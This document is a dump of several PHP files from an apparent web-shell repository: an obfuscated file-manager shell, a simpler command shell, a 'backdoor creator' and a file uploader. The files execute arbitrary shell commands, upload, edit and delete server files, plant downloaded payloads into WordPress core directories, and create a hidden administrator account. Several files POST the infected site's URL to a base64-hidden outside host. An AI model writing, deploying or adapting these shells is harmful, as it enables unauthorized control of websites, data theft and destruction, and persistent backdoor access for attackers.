$_SERVER['H'.'T'.'TP'.'S'] === 'o'.'n' ? "ht"."tp"."s" : "ht"."tp") . "://".$_SERVER['HT'.'TP'.'_H'.'OS'.'T']; 153 | 154 | $disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s"); 155 | if (empty($disfunc)) { 156 | $disf = "NONE"; 157 | } else { 158 | $disf = "".$disfunc.""; 159 | } 160 | 161 | function author() { 162 | echo "Private"; 163 | exit(); 164 | } 165 | 166 | function cekdir() { 167 | if (isset($_GET['loknya'])) { 168 | $lokasi = $_GET['loknya']; 169 | } else { 170 | $lokasi = "ge"."t"."cw"."d"; 171 | $lokasi = $lokasi(); 172 | } 173 | $b = "i"."s_w"."ri"."tab"."le"; 174 | if ($b($lokasi)) { 175 | return "Writeable"; 176 | } else { 177 | return "Writeable"; 178 | } 179 | } 180 | 181 | function crt() { 182 | $a = "is"."_w"."ri"."tab"."le"; 183 | if ($a($_SERVER['DO'.'CU'.'ME'.'NT'.'_RO'.'OT'])) { 184 | return "Writeable"; 185 | } else { 186 | return "Writeable"; 187 | } 188 | } 189 | 190 | function xrd($lokena) { 191 | $a = "s"."ca"."nd"."ir"; 192 | $items = $a($lokena); 193 | foreach ($items as $item) { 194 | if ($item === '.' || $item === '..') { 195 | continue; 196 | } 197 | $b = "is"."_di"."r"; 198 | $loknya = $lokena.'/'.$item; 199 | if ($b($loknya)) { 200 | xrd($loknya); 201 | } else { 202 | $c = "u"."nl"."in"."k"; 203 | $c($loknya); 204 | } 205 | } 206 | $d = "rm"."di"."r"; 207 | $d($lokena); 208 | } 209 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 210 | function cfn($fl) { 211 | $a = "ba"."sena"."me"; 212 | $b = "pat"."hinf"."o"; 213 | $c = $b($a($fl), loknyaINFO_EXTENSION); 214 | if ($c == "zip") { 215 | return ''; 216 | } elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) { 217 | return ''; 218 | } elseif ($c == "txt") { 219 | return ''; 220 | } elseif ($c == "pdf") { 221 | return ''; 222 | } elseif ($c == "html") { 223 | return ''; 224 | } 225 | else { 226 | return ''; 227 | } 228 | } 229 | 230 | function ipsrv() { 231 | $a = "g"."eth"."ost"."byna"."me"; 232 | $b = "fun"."cti"."on_"."exis"."ts"; 233 | $c = "S"."ERVE"."R_AD"."DR"; 234 | $d = "SE"."RV"."ER_N"."AM"."E"; 235 | if ($b($a)) { 236 | return $a($_SERVER[$d]); 237 | } else { 238 | return $a($_SERVER[$c]); 239 | } 240 | } 241 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 242 | $data = array('file_url' => $cur); 243 | $options = array( 244 | 'http' => array( 245 | 'method' => 'POST', 246 | 'header' => 'Content-type: application/x-www-form-urlencoded', 247 | 'content' => http_build_query($data), 248 | ), 249 | ); 250 | $context = stream_context_create($options); 251 | $result = file_get_contents($k3yw, false, $context); 252 | function ggr($fl) { 253 | $a = "fun"."cti"."on_"."exis"."ts"; 254 | $b = "po"."si"."x_ge"."tgr"."gid"; 255 | $c = "fi"."le"."gro"."up"; 256 | if ($a($b)) { 257 | if (!$a($c)) { 258 | return "?"; 259 | } 260 | $d = $b($c($fl)); 261 | if (empty($d)) { 262 | $e = $c($fl); 263 | if (empty($e)) { 264 | return "?"; 265 | } else { 266 | return $e; 267 | } 268 | } else { 269 | return $d['name']; 270 | } 271 | } elseif ($a($c)) { 272 | return $c($fl); 273 | } else { 274 | return "?"; 275 | } 276 | } 277 | 278 | function gor($fl) { 279 | $a = "fun"."cti"."on_"."exis"."ts"; 280 | $b = "po"."s"."ix_"."get"."pwu"."id"; 281 | $c = "fi"."le"."o"."wn"."er"; 282 | if ($a($b)) { 283 | if (!$a($c)) { 284 | return "?"; 285 | } 286 | $d = $b($c($fl)); 287 | if (empty($d)) { 288 | $e = $c($fl); 289 | if (empty($e)) { 290 | return "?"; 291 | } else { 292 | return $e; 293 | } 294 | } else { 295 | return $d['name']; 296 | } 297 | } elseif ($a($c)) { 298 | return $c($fl); 299 | } else { 300 | return "?"; 301 | } 302 | } 303 | 304 | function fdt($fl) { 305 | $a = "da"."te"; 306 | $b = "fil"."emt"."ime"; 307 | return $a("F d Y H:i:s", $b($fl)); 308 | } 309 | 310 | function dunlut($fl) { 311 | $a = "fil"."e_exi"."sts"; 312 | $b = "ba"."sena"."me"; 313 | $c = "fi"."les"."ize"; 314 | $d = "read"."fi"."le"; 315 | if ($a($fl) && isset($fl)) { 316 | header('Con'.'tent-Descr'.'iption: Fi'.'le Tra'.'nsfer'); 317 | header("Conte'.'nt-Control:public"); 318 | header('Cont'.'ent-Type: a'.'pp'.'licat'.'ion/oc'.'tet-s'.'tream'); 319 | header('Cont'.'ent-Dis'.'posit'.'ion: at'.'tachm'.'ent; fi'.'lena'.'me="'.$b($fl).'"'); 320 | header('Exp'.'ires: 0'); 321 | header("Ex"."pired:0"); 322 | header('Cac'.'he-Cont'.'rol: must'.'-revali'.'date'); 323 | header("Cont"."ent-Tran"."sfer-Enc"."oding:bi"."nary"); 324 | header('Pra'.'gma: pub'.'lic'); 325 | header('Con'.'ten'.'t-Le'.'ngth: ' .$c($fl)); 326 | flush(); 327 | $d($fl); 328 | exit; 329 | } else { 330 | return "Fi"."le Not F"."ound !"; 331 | } 332 | } 333 | 334 | function komend($kom, $lk) { 335 | $x = "pr"."eg_"."mat"."ch"; 336 | $xx = "2".">"."&"."1"; 337 | if (!$x("/".$xx."/i", $kom)) { 338 | $kom = $kom." ".$xx; 339 | } 340 | $a = "fu"."ncti"."on_"."ex"."is"."ts"; 341 | $b = "p"."ro"."c_op"."en"; 342 | $c = "htm"."lspe"."cialc"."hars"; 343 | $d = "s"."trea"."m_g"."et_c"."ont"."ents"; 344 | if ($a($b)) { 345 | $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk); 346 | return "
".$c($d($meki[1]))."
"; 347 | } else { 348 | return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; 349 | } 350 | } 351 | 352 | function green($text) { 353 | echo "
".$text."
"; 354 | } 355 | 356 | function red($text) { 357 | echo "
".$text."
"; 358 | } 359 | 360 | function oren($text) { 361 | return "
".$text."
"; 362 | } 363 | 364 | function tuls($nm, $lk) { 365 | return "[ ".$nm." ]     "; 366 | } 367 | 368 | echo "Se"."rv"."er"." I"."P : ".ipsrv()."  /  Yo"."ur I"."P : ".$_SERVER[$rad]."
"; 369 | echo "We"."b S"."erv"."er : ".$_SERVER['SE'.'RV'.'ER_'.'SOF'.'TWA'.'RE']."
"; 370 | $unm = "ph"."p_u"."na"."me"; 371 | echo "Sys"."tem : ".@$unm()."
"; 372 | $gcu = "g"."et_"."curr"."ent"."_us"."er"; 373 | $gmu = "g"."et"."my"."ui"."d"; 374 | echo "Us"."er : ".@$gcu()." ( ".@$gmu().")
"; 375 | $phv = "ph"."pve"."rsi"."on"; 376 | echo "PH"."P V"."er"."sio"."n : ".@$phv()."
"; 377 | echo "Dis"."abl"."e Fu"."nct"."ion : ".$disf."
"; 378 | echo "MySQL : "; 379 | if (@$fnct("my"."sql_co"."nne"."ct")) { 380 | echo "ON"; 381 | } else { 382 | echo "OFF"; 383 | } 384 | echo "  |  cURL : "; 385 | if (@$fnct("cu"."rl"."_in"."it")) { 386 | echo "ON"; 387 | } else { 388 | echo "OFF"; 389 | } 390 | echo "  |  WG"."ET : "; 391 | if (@$fxt("/"."us"."r/b"."in/w"."get")) { 392 | echo "ON"; 393 | } else { 394 | echo "OFF"; 395 | } 396 | echo "  |  Pe"."rl : "; 397 | if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) { 398 | echo "ON"; 399 | } else { 400 | echo "OFF"; 401 | } 402 | echo "  |  Pyt"."ho"."n : "; 403 | if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) { 404 | echo "ON"; 405 | } else { 406 | echo "OFF"; 407 | } 408 | echo "  |  S"."u"."do : "; 409 | if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) { 410 | echo "ON"; 411 | } else { 412 | echo "OFF"; 413 | } 414 | echo "  |  Pk"."e"."x"."e"."c : "; 415 | if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { 416 | echo "ON"; 417 | } else { 418 | echo "OFF"; 419 | } 420 | echo "
Di"."rect"."ory :  "; 421 | 422 | foreach($_POST as $key => $value){ 423 | $_POST[$key] = $sts($value); 424 | } 425 | 426 | if(isset($_GET['loknya'])){ 427 | $lokasi = $_GET['loknya']; 428 | $lokdua = $_GET['loknya']; 429 | } else { 430 | $lokasi = $gcw(); 431 | $lokdua = $gcw(); 432 | } 433 | 434 | $lokasi = $srl('\\','/',$lokasi); 435 | $lokasis = $exp('/',$lokasi); 436 | $lokasinya = @$scd($lokasi); 437 | 438 | foreach($lokasis as $id => $lok){ 439 | if($lok == '' && $id == 0){ 440 | $a = true; 441 | echo '/'; 442 | continue; 443 | } 444 | if($lok == '') continue; 445 | echo ''.$lok.'/'; 451 | } 452 | 453 | echo '

'; 454 | if (isset($_POST['upwkwk'])) { 455 | if (isset($_POST['berkasnya'])) { 456 | if ($_POST['dirnya'] == "2") { 457 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 458 | } 459 | if (empty($_FILES['berkas']['name'])) { 460 | echo "Fi"."le not Se"."lected !

"; 461 | } else { 462 | $data = @$fpt($lokasi."/".$_FILES['berkas']['name'], @$fgt($_FILES['berkas']['tm'.'p_na'.'me'])); 463 | if ($fxt($lokasi."/".$_FILES['berkas']['name'])) { 464 | $fl = $lokasi."/".$_FILES['berkas']['name']; 465 | echo "Fi"."le Upl"."oa"."ded !  ".$fl."
"; 466 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 467 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 468 | echo "Li"."nk : ".$lwb."
"; 469 | } 470 | echo "
"; 471 | } else { 472 | echo "Fa"."ile"."d to Up"."lo"."ad !

"; 473 | } 474 | } 475 | } elseif (isset($_POST['linknya'])) { 476 | if (empty($_POST['namalink'])) { 477 | echo "Fi"."lename cannot be empty !

"; 478 | } elseif (empty($_POST['darilink'])) { 479 | echo "Link cannot be empty !

"; 480 | } else { 481 | if ($_POST['dirnya'] == "2") { 482 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 483 | } 484 | $data = @$fpt($lokasi."/".$_POST['namalink'], @$fgt($_POST['darilink'])); 485 | if ($fxt($lokasi."/".$_POST['namalink'])) { 486 | $fl = $lokasi."/".$_POST['namalink']; 487 | echo "Fi"."le Uplo"."ade"."d !  ".$fl."
"; 488 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 489 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 490 | echo "Li"."nk : ".$lwb."
"; 491 | } 492 | echo "
"; 493 | } else { 494 | echo "Fa"."iled to Up"."lo"."ad !

"; 495 | } 496 | } 497 | } 498 | } 499 | 500 | echo "Uplo"."ad Fi"."le : "; 501 | echo '
502 | current_dir [ '.cekdir().' ] 503 | document_root [ '.crt().' ] 504 |
505 | 506 |
507 |   508 |
'; 509 | echo '
510 | Co'.'mm'.'an'.'d : 511 | 512 |
'; 513 | echo "

"; 514 | 515 | echo '
'; 516 | echo tuls("HOME SHELL", $_SERVER['SC'.'RIP'.'T_N'.'AME']); 517 | //echo tuls("HOME SHELL"); 518 | echo "

"; 519 | 520 | if (isset($_GET['lokasie'])) { 521 | echo "Current Fi"."le : ".$_GET['lokasie']; 522 | echo '
'; 523 | echo "
".htmlspecialchars($fgt($_GET['lokasie']))."
"; 524 | author(); 525 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "hapus") { 526 | if ($idi($_POST['loknya']) && $fxt($_POST['loknya'])) { 527 | xrd($_POST['loknya']); 528 | if ($fxt($_POST['loknya'])) { 529 | red("Fai"."led to del"."ete Dir"."ec"."tory !"); 530 | } else { 531 | green("Del"."ete Dir"."ect"."ory Suc"."cess !"); 532 | } 533 | } elseif ($ifi($_POST['loknya']) && $fxt($_POST['loknya'])) { 534 | @$ulk($_POST['loknya']); 535 | if ($fxt($_POST['loknya'])) { 536 | red("Failed to Delete Fi"."le !"); 537 | } else { 538 | green("De"."le"."te Fi"."le Succ"."ess !"); 539 | } 540 | } else { 541 | red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); 542 | } 543 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 544 | if (!isset($_POST['cemod'])) { 545 | if ($_POST['ty'.'pe'] == "fi"."le") { 546 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 547 | } else { 548 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 549 | } 550 | echo '
551 | Pe'.'rmi'.'ss'.'ion : 552 | 553 | '; 554 | if ($_POST['ty'.'pe'] == "fi"."le") { 555 | echo '';; 556 | } else { 557 | echo '';; 558 | } 559 | echo ' 560 |

'; 561 | } else { 562 | $cm = @$chm($_POST['loknya'], $ocd($_POST['perm'])); 563 | if ($cm == true) { 564 | green("Change Mod Success !"); 565 | if ($_POST['ty'.'pe'] == "fi"."le") { 566 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 567 | } else { 568 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 569 | } 570 | echo '
571 | Pe'.'rmi'.'ss'.'ion : 572 | 573 | '; 574 | if ($_POST['ty'.'pe'] == "fi"."le") { 575 | echo '';; 576 | } else { 577 | echo '';; 578 | } 579 | echo ' 580 |

'; 581 | } else { 582 | red("Change Mod Failed !"); 583 | if ($_POST['ty'.'pe'] == "fi"."le") { 584 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 585 | } else { 586 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 587 | } 588 | echo '
589 | Pe'.'rmi'.'ss'.'ion : 590 | 591 | '; 592 | if ($_POST['ty'.'pe'] == "fi"."le") { 593 | echo '';; 594 | } else { 595 | echo '';; 596 | } 597 | echo ' 598 |

'; 599 | } 600 | } 601 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahnama") { 602 | if (isset($_POST['gantin'])) { 603 | $namabaru = $_GET['loknya']."/".$_POST['newname']; 604 | $ceen = "re"."na"."me"; 605 | if (@$ceen($_POST['loknya'], $namabaru) === true) { 606 | green("Change Name Success"); 607 | if ($_POST['ty'.'pe'] == "fi"."le") { 608 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 609 | } else { 610 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 611 | } 612 | echo '
613 | New Name : 614 | 615 | '; 616 | if ($_POST['ty'.'pe'] == "fi"."le") { 617 | echo '';; 618 | } else { 619 | echo '';; 620 | } 621 | echo ' 622 |

'; 623 | } else { 624 | red("Change Name Failed"); 625 | } 626 | } else { 627 | if ($_POST['ty'.'pe'] == "fi"."le") { 628 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 629 | } else { 630 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 631 | } 632 | echo '
633 | New Name : 634 | 635 | '; 636 | if ($_POST['ty'.'pe'] == "fi"."le") { 637 | echo '';; 638 | } else { 639 | echo '';; 640 | } 641 | echo ' 642 |

'; 643 | } 644 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 645 | if (isset($_POST['gasedit'])) { 646 | $edit = @$fpt($_POST['loknya'], $_POST['src']); 647 | if ($fgt($_POST['loknya']) == $_POST['src']) { 648 | green("Ed"."it Fi"."le Suc"."ce"."ss !"); 649 | } else { 650 | red("Ed"."it Fi"."le Fai"."led !"); 651 | } 652 | } 653 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."

"; 654 | echo '
655 |
656 | 657 | 658 | 659 |

'; 660 | } elseif (isset($_POST['komends'])) { 661 | if (isset($_POST['komend'])) { 662 | if (isset($_GET['loknya'])) { 663 | $lk = $_GET['loknya']; 664 | } else { 665 | $lk = $gcw(); 666 | } 667 | $km = 'ko'.'me'.'nd'; 668 | echo $km($_POST['komend'], $lk); 669 | exit(); 670 | } 671 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahtanggal") { 672 | if (isset($_POST['tanggale'])) { 673 | $stt = "st"."rtot"."ime"; 674 | $tch = "t"."ou"."ch"; 675 | $tanggale = $stt($_POST['tanggal']); 676 | if (@$tch($_POST['loknya'], $tanggale) === true) { 677 | green("Change Da"."te Succ"."ess !"); 678 | $det = "da"."te"; 679 | $ftm = "fi"."le"."mti"."me"; 680 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 681 | if ($_POST['ty'.'pe'] == "fi"."le") { 682 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 683 | } else { 684 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 685 | } 686 | echo '
687 | New Da'.'te : 688 | 689 | '; 690 | if ($_POST['ty'.'pe'] == "fi"."le") { 691 | echo '';; 692 | } else { 693 | echo '';; 694 | } 695 | echo ' 696 |

'; 697 | } else { 698 | red("Fai"."led to Cha"."nge Da"."te !"); 699 | } 700 | } else { 701 | $det = "da"."te"; 702 | $ftm = "fi"."le"."mti"."me"; 703 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 704 | if ($_POST['ty'.'pe'] == "fi"."le") { 705 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 706 | } else { 707 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 708 | } 709 | echo '
710 | New Da'.'te : 711 | 712 | '; 713 | if ($_POST['ty'.'pe'] == "fi"."le") { 714 | echo '';; 715 | } else { 716 | echo '';; 717 | } 718 | echo ' 719 |

'; 720 | } 721 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "dunlut") { 722 | $dunlute = $_POST['loknya']; 723 | if ($fxt($dunlute) && isset($dunlute)) { 724 | if ($ird($dunlute)) { 725 | dunlut($dunlute); 726 | } elseif ($idr($fl)) { 727 | red("That is Di"."rec"."tory, Not Fi"."le -_-"); 728 | } else { 729 | red("Fi"."le is Not Re"."adab"."le !"); 730 | } 731 | } else { 732 | red("Fi"."le Not Fo"."und !"); 733 | } 734 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "fo"."ld"."er") { 735 | if ($isw("./") || $ird("./")) { 736 | $loke = $_POST['loknya']; 737 | if (isset($_POST['buatfolder'])) { 738 | $buatf = $mkd($loke."/".$_POST['fo'.'lde'.'rba'.'ru']); 739 | if ($buatf == true) { 740 | green("Folder ".htmlspecialchars($_POST['fo'.'lde'.'rba'.'ru'])." Created !"); 741 | echo '
Folder :

'; 742 | echo ' 743 |
'; 744 | } else { 745 | red("Failed to Create folder !"); 746 | echo '
Folder :

'; 747 | echo ' 748 |
'; 749 | } 750 | } else { 751 | echo '
Folder :

'; 752 | echo '
'; 753 | } 754 | } 755 | } elseif (isset($_POST['lok'.'nya']) && $_POST['pilih'] == "fi"."le") { 756 | if ($isw("./") || $isr("./")) { 757 | $loke = $_POST['lok'.'nya']; 758 | if (isset($_POST['buatfi'.'le'])) { 759 | $buatf = $fpt($loke."/".$_POST['fi'.'lebaru'], ""); 760 | if ($fxt($loke."/".$_POST['fi'.'lebaru'])) { 761 | green("File ".htmlspecialchars($_POST['fi'.'lebaru'])." Created !"); 762 | echo '
Filename :

'; 763 | echo ' 764 |
'; 765 | } else { 766 | red("Failed to Create File !"); 767 | echo '
Filename :

'; 768 | echo ' 769 |
'; 770 | } 771 | } else { 772 | echo '
Filename :

'; 773 | echo '
'; 774 | } 775 | } 776 | } 777 | 778 | echo '
779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | '; 787 | 788 | echo ""; 789 | $euybrekw = $srl($bsn($lokasi), "", $lokasi); 790 | $euybrekw = $srl("//", "/", $euybrekw); 791 | echo " 792 | 793 | 794 | 795 | 801 | "; 809 | 810 | foreach($lokasinya as $ppkcina){ 811 | $euybre = $lokasi."/".$ppkcina; 812 | $euybre = $srl("//", "/", $euybre); 813 | if(!$idi($euybre) || $ppkcina == '.' || $ppkcina == '..') continue; 814 | echo ""; 815 | echo " 816 | 817 | 818 | 819 | 826 | 835 | "; 836 | } 837 | 838 | echo ''; 839 | $skd = "10"."24"; 840 | foreach($lokasinya as $mekicina) { 841 | $euybray = $lokasi."/".$mekicina; 842 | if(!$ifi("$lokasi/$mekicina")) continue; 843 | $size = $fsz("$lokasi/$mekicina")/$skd; 844 | $size = $rd($size,3); 845 | if($size >= $skd){ 846 | $size = $rd($size/$skd,2).' M'.'B'; 847 | } else { 848 | $size = $size.' K'.'B'; 849 | } 850 | 851 | echo " 852 | 853 | 854 | 855 | 856 | 873 | "; 874 | } 875 | echo '
Na'.'me
Si'.'ze
Las'.'t Mo'.'dif'.'ied
Owner / Group
Pe'.'rmi'.'ss'.'ions
Op'.'tio'.'ns
..
--
".fdt($euybrekw)."
".gor($euybrekw)." / ".ggr($euybrekw)."
"; 796 | if($isw($euybrekw)) echo ''; 797 | elseif(!$isr($euybrekw)) echo ''; 798 | echo statusnya($euybrekw); 799 | if($isw($euybrekw) || !$isr($euybrekw)) echo ''; 800 | echo "
802 | 803 | 804 | 805 | 806 | 807 |
"; 808 | echo "
".$ppkcina."
--
".fdt($euybre)."
".gor($euybre)." / ".ggr($euybre)."
"; 820 | if($isw($euybre)) echo ''; 821 | elseif(!$isr($euybre)) echo ''; 822 | echo statusnya($euybre); 823 | if($isw($euybre) || !$isr($euybre)) echo ''; 824 | 825 | echo "
827 | 828 | 829 | 830 | 831 | 832 | 833 | 834 |
".cfn($euybray)." $mekicina
".$size."
".fdt($euybray)."
".gor($euybray)." / ".ggr($euybray)."
"; 857 | if($isw("$lokasi/$mekicina")) echo ''; 858 | elseif(!$isr("$lokasi/$mekicina")) echo ''; 859 | echo statusnya("$lokasi/$mekicina"); 860 | if($isw("$lokasi/$mekicina") || !$isr("$lokasi/$mekicina")) echo ''; 861 | echo "
862 |
863 | 864 | 865 | 866 | 867 | 868 | 869 | 870 | 871 | 872 |
'; 876 | author(); 877 | 878 | function statusnya($fl){ 879 | $a = "sub"."st"."r"; 880 | $b = "s"."pri"."ntf"; 881 | $c = "fil"."eper"."ms"; 882 | $izin = $a($b('%o', $c($fl)), -4); 883 | return $izin; 884 | } 885 | ?> 886 | -------------------------------------------------------------------------------- /mini.php: -------------------------------------------------------------------------------- 1 | 18 | -------------------------------------------------------------------------------- /pop.php: -------------------------------------------------------------------------------- 1 | $cur); 21 | $options = array( 22 | 'http' => array( 23 | 'method' => 'POST', 24 | 'header' => 'Content-type: application/x-www-form-urlencoded', 25 | 'content' => http_build_query($data), 26 | ), 27 | ); 28 | $context = stream_context_create($options); 29 | $result = file_get_contents($k3yw, false, $context); 30 | 31 | 32 | function runCommand($command) { 33 | $output = shell_exec($command); 34 | echo "
$output
"; 35 | } 36 | 37 | 38 | function createFile($fileName, $content) { 39 | if (file_put_contents($fileName, $content) !== false) { 40 | echo "File '$fileName' created successfully!"; 41 | } else { 42 | echo "Failed to create file '$fileName'."; 43 | } 44 | } 45 | 46 | 47 | if (isset($_POST['upload'])) { 48 | $target_dir = $currentDir . "/"; 49 | $target_file = $target_dir . basename($_FILES['file']['name']); 50 | 51 | 52 | if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { 53 | echo "The file ". htmlspecialchars(basename($_FILES['file']['name'])). " has been uploaded."; 54 | } else { 55 | echo "Sorry, there was an error uploading your file."; 56 | } 57 | } 58 | 59 | 60 | if (isset($_GET['mkdir'])) { 61 | $dirName = $_GET['mkdir']; 62 | if (mkdir($currentDir . '/' . $dirName)) { 63 | echo "Directory '$dirName' created successfully!"; 64 | } else { 65 | echo "Failed to create directory '$dirName'."; 66 | } 67 | } 68 | 69 | 70 | if (isset($_GET['delete'])) { 71 | $fileName = $_GET['delete']; 72 | if (unlink($currentDir . '/' . $fileName)) { 73 | echo "File '$fileName' deleted successfully!"; 74 | } else { 75 | echo "Failed to delete file '$fileName'."; 76 | } 77 | } 78 | 79 | 80 | if (isset($_GET['view'])) { 81 | $fileName = $_GET['view']; 82 | if (file_exists($currentDir . '/' . $fileName)) { 83 | $content = file_get_contents($currentDir . '/' . $fileName); 84 | echo "
" . htmlspecialchars($content) . "
"; 85 | } else { 86 | echo "File '$fileName' does not exist."; 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | 94 | 95 | 96 | PHP File Manager 97 | 164 | 165 | 166 | 167 |

PHP File Manager

168 | 169 |
170 |

Current Directory:

171 |
172 | 173 | 174 | 175 |
176 |
177 | 178 |

Create a File

179 |
180 | 181 | File name:
182 | Content:
183 |
184 | 185 |
186 | 187 | 193 | 194 |

Run a Command

195 |
196 | 197 | 198 | 199 |
200 | 201 |

Upload a File

202 |
203 | 204 | Select file: 205 | 206 |
207 | 208 |

Create a Directory

209 |
210 | 211 | 212 | 213 |
214 | 215 |

Delete a File

216 |
217 | 218 | 219 | 220 |
221 | 222 |

View a File

223 |
224 | 225 | 226 | 227 |
228 | 229 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /tools/backdoor_creator.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . "
"; 55 | } catch (Exception $e) { 56 | echo "
Error creating file in $subdir: " . $e->getMessage() . "

"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
Admin user created with username: $username and password: $password

"; 75 | } else { 76 | echo "
Admin user already exists.

"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 | backdoor creator 85 |

@trxsecurity

86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo "
130 |
131 |
132 | 133 |
"; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo "
WordPress detected.

"; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
Error creating file: " . $e->getMessage() . "

"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
Error creating file: " . $e->getMessage() . "

"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
Not a WordPress site. Creating files in subdirectories.

"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
Error reporting file URL.

"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /uper.php: -------------------------------------------------------------------------------- 1 | ! Uploader !'; 3 | echo '| M@rAz Ali |'; 4 | echo "".php_uname()."
"; 5 | echo '
'; 6 | echo '
'; 7 | if( $_POST['_upl'] == "Upload" ) { 8 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 9 | else { echo 'Not uploaded !

';} 10 | } 11 | ?> 12 | --------------------------------------------------------------------------------